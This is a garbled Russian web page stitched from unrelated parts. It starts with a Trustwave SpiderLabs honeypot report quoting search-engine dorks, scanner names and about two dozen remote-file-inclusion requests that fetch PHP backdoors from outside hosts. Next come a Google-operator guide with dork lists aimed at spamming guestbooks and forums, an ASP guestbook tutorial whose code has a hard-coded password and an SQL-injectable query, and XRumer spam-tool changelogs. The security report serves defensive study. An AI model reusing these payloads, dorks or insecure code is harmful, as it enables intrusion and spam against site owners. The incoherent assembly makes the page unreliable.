Жаба inurl sign guestbook asp. Просмотр списка файлов в директориях

As you may have heard, Trustwave SpiderLabs released our , which highlights a vast amount of valuable data from our 2011 engagements. In this blog post, I want to highlight a specific section of the GSR which highlights specific attack methodologies used by attackers against our customers in Europe.

There is a section in the GSR dedicated to our Europe, Middle East and Asia (EMEA) region customers. Solomon Bhala, who is a Security Consultant on the Trustwave SpiderLabs Incident Response Team, outlined the following with regards to differenct attack vectors in use in the European region:

In contrast to data compromise trends in the Americas, very few data compromises occurred in POS networks in Europe, the Middle East and Africa (EMEA). Rather, as a result of higher adoption of "chip & pin" (EMV) and deprecation of magnetic stripe (mag-stripe) transactions within Europe, fewer opportunities exist in EMEA for the theft of track data used in mag-stripe transactions.

However, across the region many mag-stripe enabled POS systems remain in use to support mag-stripe only cards or transactions that fall back to mag-stripe when EMV fails. As such, card-present compromises do still occur in small numbers.

Overwhelmingly, e-commerce merchants in EMEA were the targets for cyber criminals. E-commerce businesses allow attackers to be geographically indiscriminate and concerned only with identifying targets that pose little technical complexity in compromising.

The typical vulnerabilities exploited in EMEA investigations were insecure, but legitimate file upload mechanisms or exploitable remote file inclusion vectors.

The typical attack flow looks something like this:

Source: Tustwave"s 2012 Global Security Report

The SpiderLabs Research Team has also gathered data from web honeypot systems that confirm this type of attack methodology.

Using Search Engines to Identify Targets

Attackers will often use search engine queries as a method of quickly identifying web sites that have certain characterisics for the vulnerabilties they are looking to exploit. When search engine results are returned, the attacker then has a list of possible target websites to launch attacks. Here are some example Referer data taken from the logs from our web honeypots showing use of search engine usage to identify common vulnerable apps:

Http://www.google.com/m?client=ms-aff-ucweb&output=xhtml&hl=en&q=inurl%3a+admin%2f+login.phphttp://www.google.com/m?client=ms-opera-mini&channel=new&q=inurl%3A+log.Txthttp://www.google.com/m?cx=partner-mb-pub-6630117049886772:7963048852&ie=utf8&hl=en&q=inurl%3A%20admin/login.phphttp://www.google.com/m?cx=partner-mb-pub-6630117049886772:7963048852&ie=utf8&hl=en&q=inurl%3A%20adminlogin.phphttp://yandex.ru/yandsearch?text=biz+inurl:/gbook+sign.asp
http://yandex.ru/yandsearch?text=car+used+inurl:/light.cgi?page=
http://yandex.ru/yandsearch?text=check+inurl:/guestbook.asp
http://yandex.ru/yandsearch?text=coid+inurl:/write.asp
http://yandex.ru/yandsearch?text=dates+inurl:/modules.php?name=
http://yandex.ru/yandsearch?text=devalues+inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22
http://yandex.ru/yandsearch?text=dictionary+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=event+inurl:/minibbs.cgi?log=
http://yandex.ru/yandsearch?text=harder+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=inurl:%22blog
http://yandex.ru/yandsearch?text=inurl:_articles.php?homeid=
http://yandex.ru/yandsearch?text=inurl:/fckeditor/editor/filemanager
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats altered states wikipedia
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats sanctioning body sports
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats what accomplishments to put on a resume
http://yandex.ru/yandsearch?text=inurl:/modules.php?name= questions and solutions engineering
http://yandex.ru/yandsearch?text=inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22+connection
http://yandex.ru/yandsearch?text=inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22+finance
http://yandex.ru/yandsearch?text=inurl:/register.php+north
http://yandex.ru/yandsearch?text=inurl:/register.php+you
http://yandex.ru/yandsearch?text=inurl:/?show=guestbook&lr=213
http://yandex.ru/yandsearch?text=kept+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=library+inurl:/bbs.cgi?room=
http://yandex.ru/yandsearch?text=op+inurl:/gbook.cgi?user=
http://yandex.ru/yandsearch?text=print+inurl:/guestbook.php
http://yandex.ru/yandsearch?text=provide+inurl:/bbs.cgi?room=
http://yandex.ru/yandsearch?text=systems+inurl:/board.cgi?action=
http://yandex.ru/yandsearch?text=visits+inurl:/postcards.php?image_id=
http://yandex.ru/yandsearch?text=zi+inurl:/profile.php?id=

Using Vulnerability Scanning Tools/Scripts

Here are a few of the top vulnerability scanner/script names taken from the User-Agent fields of our web honeypot logs:

DataCha0s/2.0Gootkit auto-rooter scannerMade by ZmEu @ WhiteHat Team - www.whitehat.roMaMa CaSpErMorfeus Fucking ScannerZmEu

Exploit Remote File Inclusion Vulnerabilty

Remote File Inclusion vulnerabilities are being extensively targted by attackers as a means to either execute php code or download a trojan backdoor application. Here are some RFI attack payloads that we gathered from our web honeypot just for today:

GET /become_editor.php?theme_path=http://www.univerzum.de/allnett.jpg?? HTTP/1.1
GET /become_editor.php?theme_path=http://www.univerzum.de/byroee.jpg?? HTTP/1.1
GET /become_editor.php?theme_path=?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET //manager/admin/index.php?MGR=http://www.ralphlaurenukonlineshop.com/list.txt????? HTTP/1.1
GET //php/init.poll.php?include_class=http://www.nettunoresidence.it/wp-content/themes/N7.jpg?? HTTP/1.1
GET //php/init.poll.php?include_class=http://www.nettunoresidence.it/wp-content/themes/N8.jpg?? HTTP/1.1
GET //?_SERVER=http://www.triz.or.kr//data/log/auto1.txt?? HTTP/1.1
GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://popsiclesocial.com/mmstaging//wp-admin/user/?? HTTP/1.1
GET //wp-content/plugins/wp_rokstories/?src=http://udassham.com//air.php HTTP/1.1
GET //wp-content/themes/arras/library/timhumb.php?src=http://blogger.com.mesco.com.vn/login.php HTTP/1.1
GET //wp-content/themes/arras/library/widgets.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/?src=http://blogger.com.3085.a.hostable.me/myid.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/?src=http://flickr.com.javafootwear.com/vegetable.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/_tbs.php?src=http://picasa.com.amplarh.com.br/stun.php HTTP/1.1
GET //wp-content/themes/DeepFocus/_tbs.php?src=http://blogger.com.herzelconsultores.com.ar/shell.php HTTP/1.1
GET ///wp-content/themes/editorial/functions/?src=http://blogger.com.antesagoradepois.com/depois.php HTTP/1.1
GET //wp-content/themes/Magnificent/_tbs.php?src=http://picasa.com.fuckfashionwearart.com/injekan/injekan.php HTTP/1.1
GET ///wp-content/themes/optimize/?src=http://blogger.com.antesagoradepois.com/depois.php HTTP/1.1
GET //wp-content/themes/Polished/_tbs.php?src=http://picasa.com.amplarh.com.br/stun.php HTTP/1.1
GET //wp-content/themes/prosto/functions/?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET //wp-content/themes/sakura/plugins/woo-tumblog/functions/_tbs.php?src=http://picasa.com.fuckfashionwearart.com/injekan/injekan.php HTTP/1.1
GET //wp-content/themes/telegraph/scripts/?src=http://img.youtube.com.uscd.ro/bogel.php HTTP/1.1
GET //wp-?src=http://flickr.com.bpmohio.com/byroe.php HTTP/1.1
GET //wp-?src=http://flickr.com.bpmohio.com/spread.php HTTP/1.1

Each of these files referenced by the http off site payload is some type of PHP code or backdoor. Once the backdoor/trojan web page is installed, the attacker can then use it to do the following:

Search local files for credit card holder data:

Directly connect to the database listener to search for records.

This is possible as many ACLs allow access from the localhost. This also allows the attacker to execute SQL queries that may not have been possible through SQL Injection vulnreablities in the web application.

Как правильно искать с помощью google.com

Все наверное умеют пользоваться такой поисковой системой, как гугл =) Но не все знают, что если грамотно составить поисковой запрос с помощью специальных конструкций, то можно достичь результатов того, что Вы ищете намного эффективнее и быстрее =) В этой статье я постараюсь показать что и как Вам нужно делать, чтобы искать правильно

Гугл поддерживает несколько расширенных операторов поиска, имеющими специальное значение при поиске на google.com. Типично, эти операторы изменяют поиск, или даже говорят гуглу делать полностью различные типы поиска. Например, конструкция link: является специальным оператором, и запрос link:www.google.com не даст вам нормального поиска, но вместо этого найдет все web-страницы, которые имеют связи к google.com.
альтернативные типы запросов

cache: Если Вы будете включать другие слова в запрос, то Гугл подсветит эти включенные слова в пределах кэшируемого документа.
Например, cache:www.сайт web покажет кэшируемое содержимое с подсвеченным словом "web".

link: рассматриваемый выше поисковой запрос покажет веб-страницы, на которых содержатся ссылки к указанному запросу.
Например: link:www.сайт отобразит все страницы на которых есть ссылка на http://www.сайт

related: Отобразит web-страницы, которые являются "подобными" (related) указанной web-странице.
Например, related: www.google.com перечислит web-страницы, которые являются подобными домашней странице Гугл.

info: Информация запроса: представит немного информации, которую Гугл имеет о запрашиваемой web-странице.
Например, info:сайт покажет информацию о нашем форуме =) (Армада - Форум адалт вебмастеров).

Другие информационные запросы

define: Запрос define: обеспечит определение слов, которые Вы вводите после того, как это, собранный из различных сетевых источников. Определение будет для всей введенной фразы (то есть, это будет включать все слова в точный запрос).

stocks: Если Вы начинаете запрос с stocks: Гугл обработает остальную часть сроков запроса как символы биржевых сводок, и свяжется со страницей, показывающую готовую информацию для этих символов.
Например, stocks: Intel yahoo покажет информацию о Intel и Yahoo. (Отметьте, что Вы должны напечатать символы последних новостей, не название компании)

Модификаторы Запросов

site: Если Вы включаете site: в ваш запрос, Гугл ограничит результаты теми вебсайтами, которые найдет в данном домене.
Также можно искать и по отдельным зонам, как таковое ru, org, com, etc ( site:com site:ru )

allintitle: Если Вы запускаете запрос с allintitle:, Гугл ограничит результаты со всеми словами запроса в заголовке.
Например, allintitle: google search вернет все страницы гугла по поиску как то images, Blog, etc

intitle: Если Вы включаете intitle: в вашем запросе, Гугл ограничит результаты документами, содержащими то слово в заголовке.
Например, intitle:Бизнес

allinurl: Если Вы запускаете запрос с allinurl: Гугл ограничит результаты, со всеми словами запроса в URL.
Например, allinurl: google search вернет документы с google и search в заголовке. Также как вариант можно разделять слова слэшем (/) тогда слова по обе стороны слэша будут искаться в пределах одной страницы: Пример allinurl: foo/bar

inurl: Если Вы включаете inurl: в вашем запросе, Гугл ограничит результаты документами, содержащими то слово в URL.
Например, Animation inurl:сайт

intext: ищет только в тексте страницы указанное слово, игнорируя заглавие и тексты ссылок, и прочее не относящееся к. Есть также и производная этого модификатора - allintext: т.е. далее все слова в запросе будут искаться только в тексте, что тоже бывает важно, игнорируя часто используемые слова в ссылках
Например, intext:форум

daterange: ищет во временных рамках (daterange:2452389-2452389), даты для времени указываются в Юлианском формате.

Ну и еще всякие интересные примеры запросов

Примеры составления запросов для Google. Для спамеров

Inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp “Character Count”

“Message:” inurl:sign.cfm “Sender:”

Inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post “Post Comment” “URL”

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

Inurl:?action=add “phpBook” “URL”

Intitle:”Submit New Story”

Журналы

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? “Гостевая книга”

Блоги

Inurl:blogger.com/comment.g?”postID”"anonymous”

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:”Post comment”

Inurl:pirillo.com “Post comment”

Форумы

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:”mes.php?”

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Here we start out with a simple "settings" file, named settings.asp. This file will be included on each page, and will contain the basic settings for this guestbook.

Since the password (logincode) is NOT in the database, you can leave the database in the webroot with a mappath statement to make the install easier. However, the best place for the database is outside of your webroot, in which case you would want to change the database_path string to your full path ("C:\inetpub\database\post.mdb" for example)

There is also an important settings to allow html, or not. Many times folks abuse a guestbook by filling it with links, and other junk. It would be a good idea to disallow html, unless you really need it.

The language setting is just a set of variables for text used within the system, for each language there is a different text that is used. Very easy to add a "new" language to the system.

Details

The login is a simple login check page, which checks the login code entered on the form
with the one stored in the settings.asp file.

" title of your guestbook. pagetitle = " Demo" " language " english = en, german = ger, french = fr lang = " en" " admin password logincode = " 1234" " number of entries to show. show_posts = " 25" " minimum length of post to be allowed. minimum_length = 4 " set to "no" for no html, set to "yes" to allow html (not recommended!) allow_html = " no" " leave as is, unless you want to move your database. database_path = Server .MapPath(" post.mdb" ) <%Option Explicit %> <% if Request .Form(" mynumber" ) = " " then response .redirect(" login.asp?l=password_blank" ) End If " set variables from form FormPwd = Request .Form(" mynumber" ) FormPwd = replace (FormPwd," "" ," """ ) " run login or return to login page if formpwd = logincode then Session(" LoginID" ) = formpwd else response .redirect(" login.asp?l=incorrect_login_or_password" ) End if " final redirect response .redirect(" post.asp" ) %>

The login uses session variables to store the login information, so to log off we simple abandon the session. The redirect appends the date to avoid seeing a "cached" login page after being logged out. This is not a security issue, but just for convenience.

<% session.abandon response .redirect(" post.asp?d=" & date ) %>

Now the main code is the post.asp page, this page is the same whether you are logged in as admin or just a guest visiting the page. If you are logeed in you see the same data as a guest, only you have more options available, you can delete posts, or restore deleted posts, or empty the "recycle bin" (where deleted posts are stored until you clear them out).

As you can see from the code below, we check for the loggedin session right from the start,
then we can use this throughout the rest of the script to display data based on your status as admin or guest.

<% option explicit %> <% LoggedIn = Session(" loginID" )

Once you are logged in you see more options available.

The file is split up into "parts" depending on what querystring is passed.

The section below checks to see if you are logged in and then check so see if
you have attempted to empty the "deleted" items from the database.

" ============Empty Deleted Items from the database============ If LoggedIn <> " " Then if request .querystring(" del" ) = 1 then Set dConn = Server .CreateObject (" ADODB.Connection" ) dConn.Open " & _ database_path mySQL = " DELETE FROM tblpost where active = 2;" dConn.execute(mySQL) dconn.close set dconn = nothing response .redirect(" post.asp" ) end if end if

As you can see from the rest of the main "post" code, different items are displayed or actions performed based on being logged in or not, and if so what querystring value you have passed to the page.

" ============set based on delete or undelete============ If LoggedIn <> " " Then showdeleted = request .querystring(" showdeleted" ) if showdeleted = 1 then active = 2 removetype = 1 delete_text = undelete_text delimage = " undelete.gif" else active = 1 removetype = 2 delete_text = delete_text delimage = " delete.gif" end if else active = 1 end if " ============Delete/Undelete Items from the guestbook display============ remove = request .querystring(" remove" ) if remove = 1 then Set dConn = Server .CreateObject (" ADODB.Connection" ) dConn.Open " PROVIDER=MICROSOFT.JET.OLEDB.4.0;DATA SOURCE=" & database_path removetype = request .querystring(" removetype" ) mySQL = " UPDATE tblPost SET Active = " & removetype & " WHERE ID = " & _ ID & " ;" response .write " updating" dConn.execute(mySQL) dConn.Close set dConn = Nothing response .redirect(" post.asp" ) end if " ============End Delete Section============ Set dataRS = Server .CreateObject (" ADODB.RecordSet" ) dataSQL = " Select TOP " & show_posts & " message, remote_addr, sysdate, " &_ " systime, id FROM tblPost WHERE active = " & active &_ " order by sysdate DESC, systime DESC;" " Response.Write dataSQL " response.end Set dConn = Server .CreateObject (" ADODB.Connection" ) dConn.Open " PROVIDER=MICROSOFT.JET.OLEDB.4.0;DATA SOURCE=" & database_path dataRS.Open dataSQL, dConn, 1 , 3 recordcount = dataRS.recordcount if recordcount > 0 then data = dataRS.GetRows() " Data is retrieved so close all connections dataRS.Close Set dataRS = Nothing dconn.close set dconn = nothing " Setup for array usage iRecFirst = LBound (data, 2 ) iRecLast = UBound (data, 2 ) end if " ============IF IS A POST BACK============ message = trim (request .form(" message" )) if request .form(" ispostback" ) = 1 AND (len (message) > minimum_length) then if allow_html = " no" then message = RemoveHTMLtags(message) else message = PreSubmit2(message) end if strSQL = " tblPost" " Open a recordset Set cRS2 = Server .CreateObject (" ADODB.recordset" ) Set dConn = Server .CreateObject (" ADODB.Connection" ) dConn.Open " PROVIDER=MICROSOFT.JET.OLEDB.4.0;DATA SOURCE=" &_ database_path cRS2.Open strSQL, dConn, 1 ,3 cRS2.AddNew cRS2(" message" ) = message cRS2(" sysdate" ) = date () cRS2(" systime" ) = time () cRS2(" remote_addr" ) = request .ServerVariables(" remote_addr" ) cRS2(" Active" ) = 1 cRS2.Update cRS2.Close Set cRS2 = Nothing dConn.Close Set dConn = Nothing response .redirect(" post.asp" ) end if " ============End POSTBACK Section============ %> <%=pagetitle%> </ title > </ head > <P style=" FONT-WEIGHT: bold" ><%=pagetitle%> <table border=2 bordercolor=" silver" CELLSPACING=0 CELLPADDING=4> <form action=" post.asp" method=" post" name=" form1" id=" form1" > <tr class=" smalltext"> <td><textarea cols=" 50" rows=" 4" name=" message" style=" <span>font-family: Arial, Helvetica, sans-serif;" </span> class=" cssborder" title=" <%=add_text%>" ></ textarea > </ td > <td nowrap><input type=" submit" value=" <%=add_text%>" style=" height: 50px;" class=" cssborder" ></ td > </ tr > <input type=" hidden" name=" ispostback" value=" 1" > </ form > </ table > <% if recordcount > 0 then %> <table border=" 2" cellspacing=" 0" cellpadding=" 4" bordercolor=" silver" width=" 500" > <tr> <th><%= message_text %> </ th > <% If LoggedIn <> " " then %> <th><%= delete_text %> </ th > <% end if %> </ tr > <% " <span> Loop through the records (second dimension of the array) </span> For I = iRecFirst To iRecLast Response .Write " <tr class="smalltext">" & _ " <td colspan="top">" & data(0 , I) & " [" & data(3 ,I) & " | " & data(2 , I) & " | " & data(1 , I) & " ]</td>" if LoggedIn <> " " then response .write " <span><td nowrap valign="top" align="center">" </span> response .write " <img src='/assets/" %20&%20delimage%20&%20' loading=lazy></td>" end if Next " I %> </ table > <% end if If LoggedIn <> " " Then response .write logoutlink else response .write loginlink end if " close db just in case on error resume next dConn.Close Set dConn = Nothing on error goto 0 %> <p>That is basically it, this is a very simple little guestbook, that should be easy to add to an site that supports ASP and MS Access database connections (No ODBC is necesary).</p> <p>Масштабное обновление программы XRumer, в котором значительно эволюционировала логика регистрации профилей на самых разных платформах, улучшена работа с платформами Bitrix, Joomla, WordPress Forum, MyBB, VBulletin, XenForo, добавлен механизм модификации отправляемого текста в зависимости от тематики сайта-реципиента (новый макрос #theme), обновлены и увеличены прилагаемые базы - общий объём превысил 8 миллионов сайтов, улучшена работа с HTTPS и Google ReCaptcha-2, и многое другое...</p> <i>26 января 2019 </i> <h3>XRumer 16.0.18 + SocPlugin 4.0.63</h3> <p>Прилагаемые базы проверены и обновлены, общий объём увеличен до 8 (!) миллионов поддерживаемых ресурсов — блогов, форумов, гостевых книг, досок, BBS, CMS, и прочих платформ. База известных тексткапч увеличена более чем на 2000 новых ответов на антибот-вопросы и теперь составляет 324000 тексткапч. Существенно повышена стабильность и скорость работы, оптимизирован расход ресурсов: потолок достигает до 500 и более потоков (в зависимости от режима работы). Улучшена работа с HTTPS. И основное, ключевое улучшение: многократно повышена эффективность рассылок личных сообщений — режим MassPM. Плюс, многие другие улучшения и исправления:)</p> <i>14 сентября 2018 </i> <h3>XRumer 16.0.17</h3> <p>Важное обновление XRumer, существенно оптимизирующее расход ресурсов. Повышена стабильность и скорость работы, увеличен потолок потоков. Теперь проход по многомиллионным базам более комфортен! Также улучшена работа с HTTPS, JavaScript, улучшена работа с платформой Joomla K2, и многое другое...</p> <i>05 июля 2018 </i> <p>Необходимо включить JavaScript для того, чтобы сайт работал корректно</p> <h1>Нововведения и улучшения в XRumer и SocPlugin<i>12 сентября 2014 </i></h1> <h3>Нововведения и улучшения в XRumer 12.0.7</h3> <h3>Нововведения и улучшения в SocPlugin 4.0.10</h3> <ul><li>в Автоответчике реализована поддержка Одноклассников</li> <li>обновлена функция комментирования видео на ВКонтакте</li> <li>скорректирована процедура сохранения базы анкет</li> <li>обновлён User-agent</li> <li>добавлена возможность копирования всех выделенных ссылок на анкеты в окне отображения списка анкет (а не только одной)</li> <li>реализована рандомизация каждой задержки в пределах ± 20%</li> <li>в окне списка групп добавлено выпадающее меню для управления списком: удаление, копирование, открытие в браузере</li> <li>улучшена информативность сообщений о проблемах с авторизацией</li> <li>скорректирована загрузка/сохранение списка пользователей из/в XML-файл</li> <li>скорректирована работа некоторых опций автонаполнения аккаунтов</li> <li>обновлено получение параметров анкет на Фэйсбуке</li> </ul> <p><img src='https://i1.wp.com/spinch.net.ua/images/stories/compon/phocagal1.jpg' height="156" width="132" loading=lazy><b>Компонент Phoca Guestbook </b> - это отличная гостевая книга на вашем сайте. Как и другие расширения от создателей Phoca , данный компонент выполнен достаточно профессионально и оснащен необходимыми параметрами. С помощью Phoca Guestbook можно создать не только гостевую книгу, но и форму отправки сообщений, страницу обсуждение и опросов, страницы с предложениями и замечаниями, и прочие материалы на что хватит фантазии, при этом всё это можно использовать параллельно.</p> <h2>Особенности и преимущества</h2> <ul><li>возможность создания нескольких гостевых книг</li> <li>настройка стилей, расположения и заполняемых полей</li> <li>выбор полей, которые будут показаны в сообщении</li> <li>различные виды защиты от спам-ботов</li> <li>возможность предмодерации сообщений</li> <li>установка максимального количества символов и запрет нежелательных слов</li> <li>возможность блокировки пользователей по IP</li> <li>уведомления о новых сообщениях</li> </ul><h2>Установка и панель управления</h2> <p>Проект устанавливается точно также как и большинство расширений, <b>но </b> после того, как установка завершится появятся 2 кнопки - <b>Install </b> и <b>Upgrade </b>. В случае новой установки нужно выбрать Install, в случае обновления компонента - Upgrade. Теперь можно перейти к панели управления, который можно найти по пути: Компоненты - Phoca Guestbook.</p> <p><img src='https://i1.wp.com/spinch.net.ua/images/stories/compon/phocagal2.JPG' height="108" width="367" loading=lazy></p> <h3>Раздел Posts</h3> <p>Здесь отображаются все комментарии, которые можно просматривать и в случае необходимости изменять и удалять. Также здесь предусмотрена возможность создания нового отзыва.</p> <h3>Раздел Guestbooks</h3> <p>Данный компонент имеет возможность создания нескольких гостевых книг, с различными темами - опросом, критикой, предложений и т.п. Таким образом для каждой темы создается отдельный Gusetbook, для этого нужно нажать кнопку <b>Создать </b>, и дальше обязательным является указание заголовка.</p> <h3>Info</h3> <p>Этот раздел содержит в себе краткую информацию о разработчике, установленной версии компонента и полезные ссылки. Кроме того есть большая кнопка Check Update, при нажатии на которую вы будете перемещены на другую страницу, где показана последняя версия (<i>current version </i>) и установленная(<i>your version </i>).</p> <h2><img src='https://i0.wp.com/spinch.net.ua/images/stories/compon/phocagal3.JPG' height="69" width="135" loading=lazy>Настройка компонента Phoca Guestbook</h2> <p>Перейти к настройкам можно только из панели управления (<b>Control panel </b>), где около Справки находится иконка <b>Настроек </b>. После перехода в которые откроется всплывающее окно с вкладками: Form, General, Post, Security, Права.</p> <p><img src='https://i2.wp.com/spinch.net.ua/images/stories/compon/phocagal4.JPG' width="100%" loading=lazy></p> <h4>Form</h4> <ul><li><b>Display Subject|Name|Email|Website|Content| In Form </b> - показывать или нет Тему/имя/эл.почту/сайт/поле сообщения для отправки отзыва. Если <i>required </i> - обязательно.</li> <li><span><b>Enable Javascript Editor </b> - отображать или нет визуальный редактор для поля сообщения </span></li> <li><span><b>Display Path In Javascript Editor </b> - показывать или нет html-теги внизу редактора </span></li> <li><span><b>Display Form </b> - показывать или скрывать форму (если скрыть, то при нажатии на ссылку форма откроется) </span></li> <li><span><b>Form Position </b> - расположение формы вверху (<i>Top </i>) или внизу (<i>Bottom </i>) сообщений </span></li> <li><span><b>Display Required Sign </b> - показывать или нет авторизацию, если она нужна для отправки сообщений </span></li> <li><span><b>Display Posts </b> - можно скрыть сообщения (например, когда Guestbook используется, как форма обратной связи) </span></li> <li><span><b>Editor Width|Height </b> - ширина/высота поля с сообщениями </span></li> <li><b>Table Width </b><span>- ширина таблицы в которой отображается форма </span></li> </ul><h4>General</h4> <ul><li><b>Predefined Name </b> - имя по-умолчанию</li> <li><b>Username Or Name </b> - логин или имя зарегистрированного пользоваться будут отображаться</li> <li><b>Disable User Check </b> - требуется или нет проверка пользователей по E-mail</li> <li><b>Registered Users Only </b> - если <i>Да </i>, то отправка сообщений доступна только зарегистрированным пользователям</li> <li><b>Review Item </b> - если <i>Да </i>, то сообщение будут показано после одобрения администратора</li> <li><b>Send Email </b> - выбрать пользователя, кому будут отправляться сообщения</li> </ul><h4>Post</h4> <ul><li><b>Display Name|Email|Website In Post </b> - показывать или нет имя/эл.почту/сайт в сообщениях</li> <li><b>Date Format </b> - установка формата даты</li> <li><b>Font ColorPick Color </b> - выбор цвета шрифтв</li> <li><b>Second Font ColorPick Color </b> - выбор второго цвета шрифта</li> <li><b>Background ColorPick Color </b> - выбор цвета фона</li> <li><b>Border ColorPick Color </b> - выбор цвета границ</li> <li><b>Pagination Default Value </b> - количество комментариев на странице (по умолчанию)</li> <li><b>Pagination </b> - установка, через запятую выбор количества комментариев на странице</li> <li><b>Pagination Hide All - </b> если <i>Да </i>, то опция Все (all) будет недоступна при выборе количества</li> </ul><h4>Security</h4> <ul><li><b>Forbidden Word Filter </b> - список запрещенных слов</li> <li><b>Forbidden Whole Word Filter </b> - список запрещенных слов целиком</li> <li><b>Save post with forbidden word </b> - сохранять или нет сообщения с запрещенными словами</li> <li><b>IP Ban </b> - список заблокированных IP-адресов</li> <li><b>Maximum Characters </b> - максимальное количество символов в сообщении</li> <li><b>Maximum Url </b> - максимальное количество ссылок в сообщении</li> <li><b>Not Allowed URL Identification Words </b> - список символов, которые запрещено использовать в ссылках (<i>html, //, www и т.п. </i>)</li> <li><b>Enable Captcha </b> - установить <i>No </i> или выбрать типа капчи, которая будет использоваться</li> <li><b>Captcha URL </b> - установить формат ссылки на изображение капчи, если оно не показывается</li> <li><b>Enable Captcha-Users </b> - кому показывать капчу - всем или пользователям без регистрации</li> <li><b>Standard|Math|TTF Captcha Characters </b> - виды символов для различных типов капчи</li> <li><b>reCAPTCHA Public/Private Key </b> - указать ключи, которые можно получить на сайте - www.google.com/recaptcha/admin/create</li> <li><b>Enable Akismet Spam Protection </b> - использовать или нет анти-спам защиту от Akismet</li> <li><b>Block Spam (Akismet) / Akismet API Key / Akismet URL </b> - если используете этот сервис, то нужно заполнить поля</li> <li><b>Specific Itemid </b> - указать специальный ID для компонента</li> <li><b>Enable HTML Purifier </b> - использовать или нет очистку html-кода</li> <li><b>Session Suffix </b> - установка специального суффикса против смены имени сессии</li> <li><b>Enable Hidden Field </b> - если включить скрытые поля, то их будут заполнять только боты, а не люди, таким образом сообщение не будет отправляться</li> <li><b>Enable Cache </b> - использовать или нет кэширование</li> <li><b>Enable Detecting Incoming Page </b> - определять или нет страницу, с которой был отправлен комментарий</li> </ul><h4>Права</h4> <p>Здесь можно определить необходимые права доступа различным группам пользователей.</p> <h2>Создание гостевой книги на сайте</h2> <p>Для того чтобы гостевая книга отображалась на вашем сайте, нужно создать для неё пункт меню, с типом - Guestbook.</p> <p><img src='https://i0.wp.com/spinch.net.ua/images/stories/compon/phocagal5.JPG' height="159" width="357" loading=lazy></p> <p>Далее, в <b>Обязательных параметрах </b> выбирается название гостевой книги, которая будет доступна в пункте меню, а ниже в <b>Основных параметрах </b> можно установить скрывать или нет отображение навигации на странице с комментариями.</p> <p>Для Joomla 1.5 также есть модуль, который позволяет отображать последние комментарии от компонента, но он доступен на официальном сайте только для тех, кто пожертвовал деньги проекту.</p> <p>Спонсором данной статьи выступает кофе blasercafe , лучший выбор чая и кофе для Вас и Вашей семьи.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy>");</script> </div> </article> <div class="social-buttons"> <a class="social-button social-button-facebook" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Flinuxio.ru%2Fgadgets%2Fzhaba-inurl-sign-guestbook-asp-prosmotr-spiska-failov-v-direktoriyah%2F" data-url="https://linuxio.ru/gadgets/zhaba-inurl-sign-guestbook-asp-prosmotr-spiska-failov-v-direktoriyah/" data-title="Жаба inurl sign guestbook asp. Просмотр списка файлов в директориях">Поделиться на Facebook</a> </div> <div class="sharethrough-container"></div> <div class="recommended-heading-container"> <span class="recommended-heading">Рекомендуем</span> </div> <div class="zergnet-widget"> <div class="zerglayoutcl"> <div class="zergrow"> <div class="zergentity"> <a href="/internet/zvukovye-sekvensory-midi-sekvensory-standartnye-midi-faily-ili-smf/" class="zergimg"> <img src="/uploads/f8ad37a1ba8734620ba1ea20daca44ff.jpg" nopin="true" data-pin-no-hover="true" loading=lazy> </a> <div class="zergheadline"> <a href="/internet/zvukovye-sekvensory-midi-sekvensory-standartnye-midi-faily-ili-smf/" >Звуковые секвенсоры. MIDI-секвенсоры. Стандартные MIDI-файлы, или “SMF”</a> </div> </div> <div class="zergentity"> <a href="/gadgets/zhaba-inurl-sign-guestbook-asp-prosmotr-spiska-failov-v-direktoriyah/" class="zergimg"> <img src="/uploads/3aff5280b0b90a59276a8eb7e84faa7c.jpg" nopin="true" data-pin-no-hover="true" loading=lazy> </a> <div class="zergheadline"> <a href="/gadgets/zhaba-inurl-sign-guestbook-asp-prosmotr-spiska-failov-v-direktoriyah/" >Просмотр списка файлов в директориях</a> </div> </div> <div class="zergentity"> <a href="/tvs/putevoditel-po-internetu---vse-samoe-interesnoe-v-seti-chto-delat-esli/" class="zergimg"> <img src="/uploads/cb3c192fa206eb55f586788bf34ffd70.jpg" nopin="true" data-pin-no-hover="true" loading=lazy> </a> <div class="zergheadline"> <a href="/tvs/putevoditel-po-internetu---vse-samoe-interesnoe-v-seti-chto-delat-esli/" >Что делать, если компьютер не видит сканер, МФУ?</a> </div> </div> 